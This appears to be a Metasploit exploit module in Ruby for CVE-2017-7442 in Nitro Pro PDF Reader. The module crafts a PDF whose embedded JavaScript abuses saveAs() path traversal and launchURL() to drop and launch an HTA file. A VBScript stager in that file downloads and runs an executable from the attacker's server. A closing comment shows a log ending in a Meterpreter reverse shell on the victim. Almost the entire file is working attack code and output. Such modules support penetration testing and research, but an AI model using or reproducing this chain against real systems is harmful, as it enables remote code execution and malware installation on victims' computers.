194 lines
5.8 KiB
Ruby
194 lines
5.8 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
include Msf::Exploit::FileDropper
|
|
include Msf::Exploit::FILEFORMAT
|
|
include Msf::Exploit::EXE
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
|
|
'Description' => %q{
|
|
This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
|
|
PDF Reader version 11. The saveAs() Javascript API function allows for writing
|
|
arbitrary files to the file system. Additionally, the launchURL() function allows
|
|
an attacker to execute local files on the file system and bypass the security dialog
|
|
|
|
Note: This is 100% reliable.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'mr_me <steven[at]srcincite.io>', # vulnerability discovery and exploit
|
|
'sinn3r' # help with msf foo!
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2017-7442' ],
|
|
[ 'URL', 'https://www.gonitro.com/' ],
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'DisablePayloadHandler' => false
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
# truly universal
|
|
[ 'Automatic', { } ],
|
|
],
|
|
'DisclosureDate' => 'Jul 24 2017',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options([
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
|
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
|
|
])
|
|
end
|
|
|
|
def build_vbs(url, stager_name)
|
|
name_xmlhttp = rand_text_alpha(2)
|
|
name_adodb = rand_text_alpha(2)
|
|
vbs = %Q|<script language="VBScript">
|
|
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
|
|
#{name_xmlhttp}.open "GET","http://#{url}",False
|
|
#{name_xmlhttp}.send
|
|
Set #{name_adodb} = CreateObject("ADODB.Stream")
|
|
#{name_adodb}.Open
|
|
#{name_adodb}.Type=1
|
|
#{name_adodb}.Write #{name_xmlhttp}.responseBody
|
|
#{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
|
|
set shellobj = CreateObject("wscript.shell")
|
|
shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
|
|
</script>|
|
|
vbs.gsub!(/ /,'')
|
|
return vbs
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
if request.uri =~ /\.exe/
|
|
print_status("Sending second stage payload")
|
|
return if ((p=regenerate_payload(cli)) == nil)
|
|
data = generate_payload_exe( {:code=>p.encoded} )
|
|
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
|
return
|
|
end
|
|
end
|
|
|
|
def exploit
|
|
# In order to save binary data to the file system the payload is written to a .vbs
|
|
# file and execute it from there.
|
|
@payload_name = rand_text_alpha(4)
|
|
@temp_folder = "/Windows/Temp"
|
|
register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
|
|
if datastore['SRVHOST'] == '0.0.0.0'
|
|
lhost = Rex::Socket.source_address('50.50.50.50')
|
|
else
|
|
lhost = datastore['SRVHOST']
|
|
end
|
|
payload_src = lhost
|
|
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
|
|
stager_name = rand_text_alpha(6) + ".vbs"
|
|
pdf = %Q|%PDF-1.7
|
|
4 0 obj
|
|
<<
|
|
/Length 0
|
|
>>
|
|
stream
|
|
|
|
|
pdf << build_vbs(payload_src, stager_name)
|
|
pdf << %Q|
|
|
endstream endobj
|
|
5 0 obj
|
|
<<
|
|
/Type /Page
|
|
/Parent 2 0 R
|
|
/Contents 4 0 R
|
|
>>
|
|
endobj
|
|
1 0 obj
|
|
<<
|
|
/Type /Catalog
|
|
/Pages 2 0 R
|
|
/OpenAction [ 5 0 R /Fit ]
|
|
/Names <<
|
|
/JavaScript <<
|
|
/Names [ (EmbeddedJS)
|
|
<<
|
|
/S /JavaScript
|
|
/JS (
|
|
this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
|
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
|
)
|
|
>>
|
|
]
|
|
>>
|
|
>>
|
|
>>
|
|
endobj
|
|
2 0 obj
|
|
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
|
|
endobj
|
|
3 0 obj
|
|
<<>>
|
|
endobj
|
|
xref
|
|
0 6
|
|
0000000000 65535 f
|
|
0000000166 00000 n
|
|
0000000244 00000 n
|
|
0000000305 00000 n
|
|
0000000009 00000 n
|
|
0000000058 00000 n
|
|
trailer <<
|
|
/Size 6
|
|
/Root 1 0 R
|
|
>>
|
|
startxref
|
|
327
|
|
%%EOF|
|
|
pdf.gsub!(/ /,'')
|
|
file_create(pdf)
|
|
super
|
|
end
|
|
end
|
|
|
|
=begin
|
|
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
|
|
[*] Processing scripts/nitro.rc for ERB directives.
|
|
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
|
|
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
|
|
payload => windows/meterpreter/reverse_tcp
|
|
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
|
|
LHOST => 172.16.175.1
|
|
resource (scripts/nitro.rc)> exploit
|
|
[*] Exploit running as background job.
|
|
|
|
[*] Started reverse TCP handler on 172.16.175.1:4444
|
|
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
|
|
[*] Using URL: http://0.0.0.0:8080/
|
|
[*] Local IP: http://192.168.100.4:8080/
|
|
[*] Server started.
|
|
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
|
|
[*] Sending stage (957487 bytes) to 172.16.175.232
|
|
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
|
|
[+] Deleted C:/Windows/Temp/UOIr.hta
|
|
|
|
msf exploit(nitro_reader_jsapi) > sessions -i 1
|
|
[*] Starting interaction with 1...
|
|
|
|
meterpreter > shell
|
|
Process 2412 created.
|
|
Channel 2 created.
|
|
Microsoft Windows [Version 6.1.7601]
|
|
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
|
|
|
C:\Users\researcher\Desktop>
|
|
=end
|